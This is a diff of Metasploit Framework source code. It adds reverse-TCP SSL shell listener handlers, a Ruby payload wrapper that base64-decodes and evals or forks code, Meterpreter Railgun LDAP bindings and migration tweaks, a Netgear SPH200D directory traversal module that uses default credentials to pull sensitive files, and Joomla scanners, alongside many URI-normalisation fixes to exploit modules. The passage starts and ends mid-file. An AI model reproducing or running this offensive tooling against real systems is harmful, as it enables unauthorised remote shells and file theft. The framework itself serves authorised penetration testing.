print_status 'The server did not respond to our request.'
@ -83,6 +84,12 @@ module Exploit::Remote::Web
handler
end
def tries
1
end
private
def perform_request
send_request_cgi({
'global' => true,

300
lib/msf/core/handler/reverse_tcp_double_ssl.rb Normal file
View File

@ -0,0 +1,300 @@
# -*- coding: binary -*-
module Msf
module Handler
###
#
# This module implements the reverse double TCP handler. This means
# that it listens on a port waiting for a two connections, one connection
# is treated as stdin, the other as stdout.
#
# This handler depends on having a local host and port to
# listen on.
#
###
module ReverseTcpDoubleSSL
include Msf::Handler
#
# Returns the string representation of the handler type, in this case
# 'reverse_tcp_double'.
#
def self.handler_type
return "reverse_tcp_double_ssl"
end
#
# Returns the connection-described general handler type, in this case
# 'reverse'.
#
def self.general_handler_type
"reverse"
end
#
# Initializes the reverse TCP handler and ads the options that are required
# for all reverse TCP payloads, like local host and local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LHOST,
Opt::LPORT(4444)
], Msf::Handler::ReverseTcpDoubleSSL)
register_advanced_options(
[
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
], Msf::Handler::ReverseTcpDoubleSSL)
self.conn_threads = []
end
#
# Starts the listener but does not actually attempt
# to accept a connection. Throws socket exceptions
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
end
self.listener_sock = Rex::Socket::TcpServer.create(
# 'LocalHost' => datastore['LHOST'],
'LocalPort' => datastore['LPORT'].to_i,
'Comm' => comm,
'SSL' => true,
'Context' =>
{
'Msf' => framework,
'MsfPayload' => self,
'MsfExploit' => assoc_exploit
})
end
#
# Closes the listener socket if one was created.
#
def cleanup_handler
stop_handler
# Kill any remaining handle_connection threads that might
# be hanging around
conn_threads.each { |thr|
thr.kill
}
end
#
# Starts monitoring for an inbound connection.
#
def start_handler
self.listener_thread = framework.threads.spawn("ReverseTcpDoubleSSLHandlerListener", false) {
sock_inp = nil
sock_out = nil
print_status("Started reverse double handler")
begin
# Accept two client connection
begin
client_a = self.listener_sock.accept
print_status("Accepted the first client connection...")
client_b = self.listener_sock.accept
print_status("Accepted the second client connection...")
sock_inp, sock_out = detect_input_output(client_a, client_b)
rescue
wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
return nil
end
# Increment the has connection counter
self.pending_connections += 1
# Start a new thread and pass the client connection
# as the input and output pipe. Client's are expected
# to implement the Stream interface.
conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy|
begin
chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp_copy, sock_out_copy)
handle_connection(chan.lsock)
rescue
elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}")
end
}
end while true
}
end
#
# Accept two sockets and determine which one is the input and which
# is the output. This method assumes that these sockets pipe to a
# remote shell, it should overridden if this is not the case.
#
def detect_input_output(sock_a, sock_b)
begin
# Flush any pending socket data
sock_a.get_once if sock_a.has_read_data?(0.25)
sock_b.get_once if sock_b.has_read_data?(0.25)
etag = Rex::Text.rand_text_alphanumeric(16)
echo = "echo #{etag};\n"
print_status("Command: #{echo.strip}")
print_status("Writing to socket A")
sock_a.put(echo)
print_status("Writing to socket B")
sock_b.put(echo)
print_status("Reading from sockets...")
resp_a = ''
resp_b = ''
if (sock_a.has_read_data?(1))
print_status("Reading from socket A")
resp_a = sock_a.get_once
print_status("A: #{resp_a.inspect}")
end
if (sock_b.has_read_data?(1))
print_status("Reading from socket B")
resp_b = sock_b.get_once
print_status("B: #{resp_b.inspect}")
end
print_status("Matching...")
if (resp_b.match(etag))
print_status("A is input...")
return sock_a, sock_b
else
print_status("B is input...")
return sock_b, sock_a
end
rescue ::Exception
print_status("Caught exception in detect_input_output: #{$!}")
end
end
#
# Stops monitoring for an inbound connection.
#
def stop_handler
# Terminate the listener thread
if (self.listener_thread and self.listener_thread.alive? == true)
self.listener_thread.kill
self.listener_thread = nil
end
if (self.listener_sock)
self.listener_sock.close
self.listener_sock = nil
end
end
protected
attr_accessor :listener_sock # :nodoc:
attr_accessor :listener_thread # :nodoc:
attr_accessor :conn_threads # :nodoc:
module TcpReverseDoubleSSLChannelExt
attr_accessor :localinfo
attr_accessor :peerinfo
end
###
#
# This class wrappers the communication channel built over the two inbound
# connections, allowing input and output to be split across both.
#
###
class TcpReverseDoubleSSLSessionChannel
include Rex::IO::StreamAbstraction
def initialize(framework, inp, out)
@framework = framework
@sock_inp = inp
@sock_out = out
initialize_abstraction
self.lsock.extend(TcpReverseDoubleSSLChannelExt)
self.lsock.peerinfo = @sock_inp.getpeername[1,2].map{|x| x.to_s}.join(":")
self.lsock.localinfo = @sock_inp.getsockname[1,2].map{|x| x.to_s}.join(":")
monitor_shell_stdout
end
#
# Funnel data from the shell's stdout to +rsock+
#
# +StreamAbstraction#monitor_rsock+ will deal with getting data from
# the client (user input). From there, it calls our write() below,
# funneling the data to the shell's stdin on the other side.
#
def monitor_shell_stdout
# Start a thread to pipe data between stdin/stdout and the two sockets
@monitor_thread = @framework.threads.spawn("ReverseTcpDoubleSSLHandlerMonitor", false) {
begin
while true
# Handle data from the server and write to the client
if (@sock_out.has_read_data?(0.50))
buf = @sock_out.get_once
break if buf.nil?
rsock.put(buf)
end
end
rescue ::Exception => e
ilog("ReverseTcpDoubleSSL monitor thread raised #{e.class}: #{e}")
end
# Clean up the sockets...
begin
@sock_inp.close
@sock_out.close
rescue ::Exception
end
}
end
def write(buf, opts={})
@sock_inp.write(buf, opts)
end
def read(length=0, opts={})
@sock_out.read(length, opts)
end
#
# Closes the stream abstraction and kills the monitor thread.
#
def close
@monitor_thread.kill if (@monitor_thread)
@monitor_thread = nil
cleanup_abstraction
end
end
end
end
end

124
lib/msf/core/handler/reverse_tcp_ssl.rb Normal file
View File

@ -0,0 +1,124 @@
require 'rex/socket'
require 'thread'
require 'msf/core/handler/reverse_tcp'
module Msf
module Handler
###
#
# This module implements the reverse TCP handler. This means
# that it listens on a port waiting for a connection until
# either one is established or it is told to abort.
#
# This handler depends on having a local host and port to
# listen on.
#
###
module ReverseTcpSsl
include Msf::Handler::ReverseTcp
#
# Returns the string representation of the handler type, in this case
# 'reverse_tcp_ssl'.
#
def self.handler_type
return "reverse_tcp_ssl"
end
#
# Returns the connection-described general handler type, in this case
# 'reverse'.
#
def self.general_handler_type
"reverse"
end
#
# Initializes the reverse TCP SSL handler and adds the certificate option.
#
def initialize(info = {})
super
register_advanced_options(
[
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
], Msf::Handler::ReverseTcpSsl)
end
#
# Starts the listener but does not actually attempt
# to accept a connection. Throws socket exceptions
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies'
end
ex = false
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
comm = datastore['ReverseListenerComm']
if comm.to_s == "local"
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs.each { |ip|
begin
comm.extend(Rex::Socket::SslTcp)
self.listener_sock = Rex::Socket::SslTcpServer.create(
'LocalHost' => datastore['LHOST'],
'LocalPort' => datastore['LPORT'].to_i,
'Comm' => comm,
'SSLCert' => datastore['SSLCert'],
'Context' =>
{
'Msf' => framework,
'MsfPayload' => self,
'MsfExploit' => assoc_exploit
})
ex = false
comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip )
comm_used = Rex::Socket::Comm::Local if comm_used == nil
if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) )
via = "via the #{comm_used.type} on session #{comm_used.sid}"
else
via = ""
end
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
break
rescue
ex = $!
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
end
}
raise ex if (ex)
end
end
end
end

16
lib/msf/core/module/platform.rb
View File

@ -479,4 +479,20 @@ class Msf::Module::Platform
Rank = 100
Alias = "php"
end
#
# JavaScript
#
class JavaScript < Msf::Module::Platform
Rank = 100
Alias = "js"
end
#
# Python
#
class Python < Msf::Module::Platform
Rank = 100
Alias = "python"
end
end

39
lib/msf/core/payload/ruby.rb Normal file
View File

@ -0,0 +1,39 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::Ruby
def initialize(info = {})
super(info)
register_advanced_options(
[
# Since space restrictions aren't really a problem, default this to
# true.
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ])
]
)
end
def prepends(buf)
if datastore['PrependFork']
buf = %Q^
code = %(#{ Rex::Text.encode_base64(buf) }).unpack(%(m0)).first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
inp = IO.popen(%(ruby), %(wb)) rescue nil
if inp
inp.write(code)
inp.close
end
else
if ! Process.fork()
eval(code) rescue nil
end
end
^.strip.split(/\n/).map{|line| line.strip}.join("\n")
end
buf
end
end

107
lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb Normal file
View File

@ -0,0 +1,107 @@
# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Railgun
module Def
class Def_wldap32
def self.create_dll(dll_path = 'wldap32')
dll = DLL.new(dll_path, ApiConstants.manager)
dll.add_function('ldap_sslinitA', 'DWORD',[
['PCHAR', 'HostName', 'in'],
['DWORD', 'PortNumber', 'in'],
['DWORD', 'secure', 'in']
])
dll.add_function('ldap_bind_sA', 'DWORD',[
['DWORD', 'ld', 'in'],
['PCHAR', 'dn', 'in'],
['PCHAR', 'cred', 'in'],
['DWORD', 'method', 'in']
])
dll.add_function('ldap_search_sA', 'DWORD',[
['DWORD', 'ld', 'in'],
['PCHAR', 'base', 'in'],
['DWORD', 'scope', 'in'],
['PCHAR', 'filter', 'in'],
['PCHAR', 'attrs[]', 'in'],
['DWORD', 'attrsonly', 'in'],
['PDWORD', 'res', 'out']
])
dll.add_function('ldap_count_entries', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'res', 'in']
])
dll.add_function('ldap_first_entry', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'res', 'in']
])
dll.add_function('ldap_next_entry', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'entry', 'in']
])
dll.add_function('ldap_first_attributeA', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'entry', 'in'],
['DWORD', 'ptr', 'in']
])
dll.add_function('ldap_next_attributeA', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'entry', 'in'],
['DWORD', 'ptr', 'inout']
])
dll.add_function('ldap_count_values', 'DWORD',[
['DWORD', 'vals', 'in'],
])
dll.add_function('ldap_get_values', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'entry', 'in'],
['PCHAR', 'attr', 'in']
])
dll.add_function('ldap_value_free', 'DWORD',[
['DWORD', 'vals', 'in'],
])
dll.add_function('ldap_memfree', 'VOID',[
['DWORD', 'block', 'in'],
])
dll.add_function('ber_free', 'VOID',[
['DWORD', 'pBerElement', 'in'],
['DWORD', 'fbuf', 'in'],
])
dll.add_function('LdapGetLastError', 'DWORD',[])
dll.add_function('ldap_err2string', 'DWORD',[
['DWORD', 'err', 'in']
])
dll.add_function('ldap_msgfree', 'DWORD', [
['DWORD', 'res', 'in']
])
dll.add_function('ldap_unbind', 'DWORD', [
['DWORD', 'ld', 'in']
])
return dll
end
end
end; end; end; end; end; end; end

1
lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
View File

@ -77,6 +77,7 @@ class Railgun
'netapi32',
'crypt32',
'wlanapi',
'wldap32'
].freeze
##

10
lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
View File

@ -342,7 +342,15 @@ class Console::CommandDispatcher::Core
return
end
print_status("Migrating to #{pid}...")
begin
server = client.sys.process.open
rescue TimeoutError => e
elog(e.to_s)
rescue RequestError => e
elog(e.to_s)
end
server ? print_status("Migrating from #{server.pid} to #{pid}...") : print_status("Migrating to #{pid}")
# Do this thang.
client.core.migrate(pid)

2
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
View File

@ -129,7 +129,7 @@ class Console::CommandDispatcher::Stdapi::Ui
def cmd_screenshot( *args )
path = Rex::Text.rand_text_alpha(8) + ".jpeg"
quality = 50
view = true
view = false
screenshot_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner." ],

1
modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
View File

@ -75,6 +75,7 @@ class Metasploit4 < Msf::Auxiliary
begin
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',

121
modules/auxiliary/admin/http/netgear_sph200d_traversal.rb Normal file
View File

@ -0,0 +1,121 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Netgear SPH200D Directory Traversal Vulnerability',
'Description' => %q{
This module exploits a directory traversal vulnerablity which is present in
Netgear SPH200D Skype telephone.
},
'References' =>
[
[ 'BID', '57660' ],
[ 'EDB', '24441' ],
[ 'URL', 'http://support.netgear.com/product/SPH200D' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-002' ]
],
'Author' => [ 'm-1-k-3' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptPath.new('FILELIST', [ true, "File containing sensitive files, one per line",
File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]),
OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
OptString.new('PASSWORD',[ true, 'Password to login with', 'password'])
], self.class)
end
def extract_words(wordfile)
return [] unless wordfile && File.readable?(wordfile)
begin
words = File.open(wordfile, "rb") do |f|
f.read
end
rescue
return []
end
save_array = words.split(/\r?\n/)
return save_array
end
#traversal every file
def find_files(file,user,pass)
traversal = '/../../'
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(traversal, file),
'basic_auth' => "#{user}:#{pass}"
})
if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/
print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
report_web_vuln({
:host => rhost,
:port => rport,
:vhost => datastore['VHOST'],
:path => "/",
:pname => normalize_uri(traversal, file),
:risk => 3,
:proof => normalize_uri(traversal, file),
:name => self.fullname,
:category => "web",
:method => "GET"
})
loot = store_loot("lfi.data","text/plain",rhost, res.body,file)
vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")
elsif res and res.code
vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}")
end
end
def run_host(ip)
user = datastore['USERNAME']
pass = datastore['PASSWORD']
vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
#test login
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET',
'basic_auth' => "#{user}:#{pass}"
})
return :abort if res.nil?
return :abort if (res.headers['Server'].nil? or res.headers['Server'] !~ /simple httpd/)
return :abort if (res.code == 404)
if [200, 301, 302].include?(res.code)
vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
else
vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
return :abort
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return :abort
end
extract_words(datastore['FILELIST']).each do |file|
find_files(file,user,pass) unless file.empty?
end
end
end

4
modules/auxiliary/admin/http/typo3_sa_2009_001.rb
View File

@ -96,7 +96,9 @@ class Metasploit4 < Msf::Auxiliary
juhash = Digest::MD5.hexdigest(juarray)
juhash = juhash[0..9] # shortMD5 value for use as juhash
file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
uri_base_path = normalize_uri(uri, '/index.php')
file_uri = "#{uri_base_path}?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")
begin

4
modules/auxiliary/admin/tikiwiki/tikidblib.rb
View File

@ -47,8 +47,8 @@ class Metasploit3 < Msf::Auxiliary
def run
print_status("Establishing a connection to the target...")
uri = normalize_uri(datastore['URI'])
rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')
rpath = uri + "?days=1&offset=0&sort_mode="
res = send_request_raw({
'uri' => rpath,

2
modules/auxiliary/dos/http/webrick_regex.rb
View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
def run
begin
o = {
'uri' => normalize_uri(datastore['URI']) || '/',
'uri' => normalize_uri(datastore['URI']),
'headers' => {
'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
}

15
modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
View File

@ -55,9 +55,17 @@ class Metasploit3 < Msf::Auxiliary
# Call the User site, so the db statement will be cached
def cache_user_info(user_id)
user_url = normalize_uri("/#{wordpress_url}?author=#{user_id}")
user_url = normalize_uri(wordpress_url)
begin
send_request_cgi({ "uri" => user_url, "method" => "GET" })
send_request_cgi(
{
"uri" => user_url,
"method" => "GET",
"vars_get" => {
"author" => user_id.to_s
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
vprint_error("Unable to connect to #{url}")
return nil
@ -83,7 +91,8 @@ class Metasploit3 < Msf::Auxiliary
key="w3tc_#{host}_#{site_id}_sql_#{query_md5}"
key_md5 = ::Rex::Text.md5(key)
hash_path = "/#{key_md5[0,1]}/#{key_md5[1,1]}/#{key_md5[2,1]}/#{key_md5}"
url = normalize_uri("/#{wordpress_url}#{datastore["WP_CONTENT_DIR"]}/w3tc/dbcache#{hash_path}")
url = normalize_uri(wordpress_url, datastore["WP_CONTENT_DIR"], "/w3tc/dbcache")
uri << hash_path
result = nil
begin

13
modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb → modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb
View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def proto
'ftp'
@ -28,7 +29,11 @@ class Metasploit3 < Msf::Auxiliary
Although the daemon runs with SYSTEM privileges, access is limited to files
that reside on the same drive as the FTP server's root directory.
},
'Author' => 'jduck',
'Author' =>
[
'jduck',
'Brandon McCann @zeknox <bmccann[at]accuvant.com>',
],
'License' => MSF_LICENSE,
'References' =>
[
@ -47,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
def run_host(ip)
connect_login
@ -55,7 +60,8 @@ class Metasploit3 < Msf::Auxiliary
res = send_cmd( ['XCRC', path, "0", "9999999999"], true )
if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./)
raise RuntimeError, "Unable to obtain file size! File probably doesn't exist."
print_error("Unable to obtain file size! File probably doesn't exist.")
return
end
file_size = $1.to_i
@ -94,6 +100,7 @@ class Metasploit3 < Msf::Auxiliary
fname = datastore['PATH'].gsub(/[\/\\]/, '_')
p = store_loot("titanftp.traversal", "text/plain", "rhost", file_data, fname)
print_status("Saved in: #{p}")
vprint_status(file_data.inspect)
disconnect

2
modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
View File

@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
print_status("#{rhost}:#{rport} - Sending request...")
uri = normalize_uri(target_uri.to_s)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',

4
modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
View File

@ -57,7 +57,7 @@ class Metasploit4 < Msf::Auxiliary
end
def run_host(ip)
uri = normalize_uri(target_uri.to_s)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET'})
@ -71,7 +71,7 @@ class Metasploit4 < Msf::Auxiliary
end
def accessfile(rhost)
uri = normalize_uri(target_uri.to_s)
uri = normalize_uri(target_uri.path)
print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'

5
modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb
View File

@ -49,8 +49,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
base = normalize_uri(target_uri.path)
base << '/' if base[-1,1] != '/'
base = target_uri.path
peer = "#{ip}:#{rport}"
fname = datastore['FILE']
@ -61,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_cgi({
'method' => 'GET',
'encode_params' => false,
'uri' => "#{base}gmap/view_overlay.php",
'uri' => normalize_uri(base, "gmap/view_overlay.php"),
'vars_get' => {
'overlay_type' => "#{traverse}#{fname}%00"
}

3
modules/auxiliary/scanner/http/clansphere_traversal.rb
View File

@ -46,7 +46,6 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
base = normalize_uri(target_uri.path)
base << '/' if base[-1,1] != '/'
peer = "#{ip}:#{rport}"
@ -58,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}index.php",
'uri' => normalize_uri(base, "index.php"),
'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png"
})

4
modules/auxiliary/scanner/http/concrete5_member_list.rb
View File

@ -44,10 +44,10 @@ class Metasploit4 < Msf::Auxiliary
end
def run_host(rhost)
url = normalize_uri(datastore['URI'])
url = normalize_uri(datastore['URI'], '/index.php/members')
begin
res = send_request_raw({'uri' => "#{url}/index.php/members"})
res = send_request_raw({'uri' => url})
rescue ::Rex::ConnectionError
print_error("#{peer} Unable to connect to #{url}")

2
modules/auxiliary/scanner/http/dolibarr_login.rb
View File

@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@uri = normalize_uri(target_uri)
@uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"

4
modules/auxiliary/scanner/http/glassfish_login.rb
View File

@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
headers['Content-Type'] = ctype if ctype != nil
headers['Content-Length'] = data.length if data != nil
uri = normalize_uri(target_uri)
uri = normalize_uri(target_uri.path)
res = send_request_raw({
'uri' => "#{uri}#{path}",
'method' => method,
@ -218,7 +218,7 @@ class Metasploit3 < Msf::Auxiliary
#Get GlassFish version
edition, version, banner = get_version(res)
path = normalize_uri(datastore['PATH'])
path = normalize_uri(target_uri.path)
target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
print_status("#{target_url} - GlassFish - Attempting authentication")

8
modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
View File

@ -60,8 +60,10 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
res = send_request_cgi({
'uri' => "#{@uri}services/APISiteScopeImpl",
'uri' => uri,
'method' => 'GET'})
if not res
@ -91,8 +93,10 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{@peer} - Retrieving the SiteScope Configuration")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
res = send_request_cgi({
'uri' => "#{@uri}services/APISiteScopeImpl",
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,

8
modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
View File

@ -59,8 +59,10 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APIMonitorImpl')
res = send_request_cgi({
'uri' => "#{@uri}services/APIMonitorImpl",
'uri' => uri,
'method' => 'GET'})
if not res
@ -95,8 +97,10 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{@peer} - Retrieving the file contents")
uri = normalize_uri(@uri, 'services/APIMonitorImpl')
res = send_request_cgi({
'uri' => "#{@uri}services/APIMonitorImpl",
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,

6
modules/auxiliary/scanner/http/http_put.rb
View File

@ -81,7 +81,7 @@ class Metasploit4 < Msf::Auxiliary
begin
res = send_request_cgi(
{
'uri' => path,
'uri' => normalize_uri(path),
'method' => 'PUT',
'ctype' => 'text/plain',
'data' => data,
@ -102,7 +102,7 @@ class Metasploit4 < Msf::Auxiliary
begin
res = send_request_cgi(
{
'uri' => path,
'uri' => normalize_uri(path),
'method' => 'DELETE',
'ctype' => 'text/html',
}, 20
@ -119,7 +119,7 @@ class Metasploit4 < Msf::Auxiliary
# Main function for the module, duh!
#
def run_host(ip)
path = normalize_uri(datastore['PATH'])
path = datastore['PATH']
data = datastore['FILEDATA']
if path[-1,1] != '/'

109
modules/auxiliary/scanner/http/joomla_pages.rb Normal file
View File

@ -0,0 +1,109 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
# Joomscan and various MSF modules for code examples.
def initialize
super(
'Name' => 'Joomla Page Scanner',
'Description' => %q{
This module scans a Joomla install for common pages.
},
'Author' => [ 'newpid0' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def run_host(ip)
tpath = normalize_uri(target_uri.path)
if tpath[-1,1] != '/'
tpath += '/'
end
pages = [
'robots.txt',
'administrator/index.php',
'admin/',
'index.php/using-joomla/extensions/components/users-component/registration-form',
'index.php/component/users/?view=registration',
'htaccess.txt'
]
vprint_status("#{peer} - Checking for interesting pages")
pages.each do |page|
scan_pages(tpath, page, ip)
end
end
def scan_pages(tpath, page, ip)
res = send_request_cgi({
'uri' => "#{tpath}#{page}",
'method' => 'GET',
})
return if not res or not res.body or not res.code
res.body.gsub!(/[\r|\n]/, ' ')
if (res.code == 200)
note = "Page Found"
if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/)
note = "Administrator Login Page"
elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/)
note = "Registration Page"
end
print_good("#{peer} - #{note}: #{tpath}#{page}")
report_note(
:host => ip,
:port => datastore['RPORT'],
:proto => 'http',
:ntype => 'joomla_page',
:data => "#{note}: #{tpath}#{page}",
:update => :unique_data
)
elsif (res.code == 403)
if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
elsif (res.body =~ /has a list of IP addresses that are not allowed/)
vprint_status("#{ip} restricted access by IP")
elsif (res.body =~ /SSL client certificate is required/)
vprint_status("#{ip} requires a SSL client certificate")
else
vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}")
end
end
return
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return
end
end

175
modules/auxiliary/scanner/http/joomla_plugins.rb Normal file
View File

@ -0,0 +1,175 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
# Joomscan and various MSF modules for code examples.
def initialize
super(
'Name' => 'Joomla Plugins Scanner',
'Description' => %q{
This module scans a Joomla install for plugins and potential
vulnerabilities.
},
'Author' => [ 'newpid0' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']),
OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")])
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def run_host(ip)
tpath = normalize_uri(target_uri.path)
if tpath[-1,1] != '/'
tpath += '/'
end
